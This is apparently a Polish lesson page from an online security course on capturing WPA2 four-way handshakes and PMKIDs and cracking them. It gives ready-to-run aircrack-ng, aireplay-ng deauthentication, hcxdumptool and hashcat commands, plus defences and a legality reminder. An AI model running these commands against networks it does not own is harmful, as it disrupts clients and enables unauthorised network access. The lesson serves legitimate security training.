0Pricing
Cyber Security Academy · Lekcja

Przechwytywanie i łamanie uzgadniania WPA2

Przechwycą Państwo 4-way handshake za pomocą aircrack-ng i podejmą próbę ataku słownikowego z użyciem Hashcat.

Przechwytywanie i łamanie uzgadniania WPA2 to bezpłatna lekcja Cyber Security Academy na CoddyKit. To lekcja 2 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Cyber Security Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.

Czterokierunkowe uzgadnianie

Gdy klient łączy się z siecią WPA2, czterokierunkowe uzgadnianie wyprowadza klucz Pairwise Transient Key (PTK) z PMK (wyprowadzanego z PSK) oraz losowych wartości nonce. Przechwycenie tego uzgadniania umożliwia offline łamanie haseł.

Konfigurowanie trybu monitorowania

Tryb monitorowania umożliwia karcie bezprzewodowej przechwytywanie wszystkich ramek niezależnie od ich adresata — jest niezbędny do pasywnego przechwytywania handshake. Działa tylko z kartami obsługującymi tryb monitorowania.

# Check wireless interface
iwconfig

# Enable monitor mode
sudo airmon-ng start wlan0
# Creates: wlan0mon

# Kill interfering processes first:
sudo airmon-ng check kill

Pasywne przechwytywanie handshake

Airodump-ng pasywnie przechwytuje ramki. Należy poczekać, aż klient połączy się w naturalny sposób, albo wymusić ponowne połączenie za pomocą deautentykacji. Informacja o przechwyceniu handshake pojawia się w prawym górnym rogu wyjścia airodump.

# Scan for networks
sudo airodump-ng wlan0mon

# Target a specific AP (replace values)
sudo airodump-ng -c 6 \
  --bssid AA:BB:CC:DD:EE:FF \
  -w handshake_capture \
  wlan0mon

# Top right shows: WPA handshake: AA:BB:...

Atak deautentykacji

Wysyłanie sfałszowanych ramek deautentykacji zmusza połączonych klientów do rozłączenia i ponownego połączenia, wywołując przechwycenie nowego handshake. Taki atak generuje dużo szumu i można go wykryć, a klient musi znajdować się w zasięgu.

# Send deauth frames (authorized labs only)
sudo aireplay-ng -0 5 \
  -a AA:BB:CC:DD:EE:FF \
  -c CC:DD:EE:FF:00:11 \
  wlan0mon

# -0 5 = send 5 deauth frames
# -a = AP MAC
# -c = client MAC (or omit for broadcast)

Atak PMKID: klient nie jest potrzebny

Atak PMKID (hcxdumptool) przechwytuje PMKID z ramek beacon/probe bez konieczności obecności połączonego klienta. PMKID można uzyskać szybciej, a jego złamanie jest równie możliwe jak złamanie pełnego handshake.

# Capture PMKID
hcxdumptool -i wlan0mon --enable_status=1 \
  -o pmkid.pcapng

# Convert for Hashcat
hcxpcapngtool -o hash.hc22000 pmkid.pcapng

# Crack with Hashcat mode 22000
hashcat -m 22000 hash.hc22000 rockyou.txt

Łamanie handshake za pomocą Hashcat

Należy przekonwertować plik przechwycenia i przeprowadzić atak za pomocą Hashcat w trybie 22000 (ujednolicony format WPA2) albo w trybie 2500 (format starszego typu). Najlepsze wyniki zapewnia użycie rockyou.txt wraz z regułami.

# Convert pcap to Hashcat format
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap

# Crack with dictionary
hashcat -m 22000 hash.hc22000 rockyou.txt

# With rules
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule

# Brute force (short passwords)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d

Łamanie za pomocą Aircrack-ng

Aircrack-ng wykonuje oparte na CPU łamanie WPA2 bezpośrednio z pliku przechwycenia. Jest wolniejsze niż łamanie za pomocą GPU w Hashcat, ale nie wymaga konwersji formatu.

# Crack with aircrack-ng
aircrack-ng -w rockyou.txt handshake_capture-01.cap

# With multiple wordlists:
aircrack-ng -w wordlist1.txt,wordlist2.txt capture-01.cap

Strategia doboru listy słów

Skuteczność łamania haseł WPA2 zależy w całości od jakości listy słów. Należy użyć: rockyou.txt jako podstawy, zestawów reguł Hashcat do modyfikacji, list słów specyficznych dla firmy (nazwa+rok+symbol) oraz ukierunkowanych list utworzonych na podstawie OSINT.

Rzeczywisty czas łamania

Złamanie losowego hasła WPA2 o długości co najmniej 20 znaków jest obliczeniowo niewykonalne. Łamanie jest praktyczne tylko w przypadku krótkich haseł lub haseł opartych na słowniku. Dlatego długość i losowość hasła mają większe znaczenie niż reguły złożoności.

Zabezpieczenia

Należy używać WPA3-SAE (odpornego na offline ataki słownikowe) albo WPA2 z losowym hasłem o długości co najmniej 20 znaków, a także WPA2-Enterprise z EAP-TLS (z certyfikatami zamiast haseł).

Przypomnienie dotyczące legalności

Przechwytywanie handshake WPA2 w sieciach, których nie są Państwo właścicielem, jest nielegalne. Wszystkie opisane tutaj techniki mają zastosowanie wyłącznie do własnych sieci testowych lub autoryzowanych środowisk laboratoryjnych (np. domowego laboratorium albo dedykowanego testowego punktu dostępowego).

Szybkie sprawdzenie

Co poprawia atak PMKID w porównaniu ze standardowym przechwytywaniem handshake?

Podsumowanie: łamanie WPA2

Przechwycenie handshake WPA2 lub PMKID przekształca łamanie zabezpieczeń Wi-Fi w offline atak słownikowy. Skuteczność zależy w całości od siły hasła — krótkie hasła oparte na słowniku szybko padają, a długie i losowe są praktycznie niemożliwe do złamania. Zabezpieczenia należy opierać na WPA3-SAE, silnych hasłach oraz WPA2-Enterprise w sieciach firmowych.

Często zadawane pytania

Czy lekcja „Przechwytywanie i łamanie uzgadniania WPA2” jest bezpłatna?

Tak — pełny tekst „Przechwytywanie i łamanie uzgadniania WPA2” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Cyber Security Academy, przejdź na CoddyKit PRO. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.

Co nauczysz się w „Przechwytywanie i łamanie uzgadniania WPA2”?

Przechwycą Państwo 4-way handshake za pomocą aircrack-ng i podejmą próbę ataku słownikowego z użyciem Hashcat. Ćwiczysz Cyber Security Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.

Czy potrzebuję doświadczenia, aby zacząć Cyber Security Academy?

Nie wymagamy żadnego doświadczenia. Cyber Security Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 2 z 4.

Ile czasu zajmuje lekcja „Przechwytywanie i łamanie uzgadniania WPA2”?

Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.

Czy mogę pisać i uruchamiać kod w tej lekcji Cyber Security Academy?

Tak. Każda lekcja Cyber Security Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.

Wszystkie lekcje w tym kursie

  1. Protokoły bezpieczeństwa 802.11: WEP, WPA2 i WPA3
  2. Przechwytywanie i łamanie uzgadniania WPA2
  3. Ataki Evil Twin i fałszywe captive portale
  4. Firmowe sieci Wi-Fi: EAP i RADIUS
← Powrót do Cyber Security Academy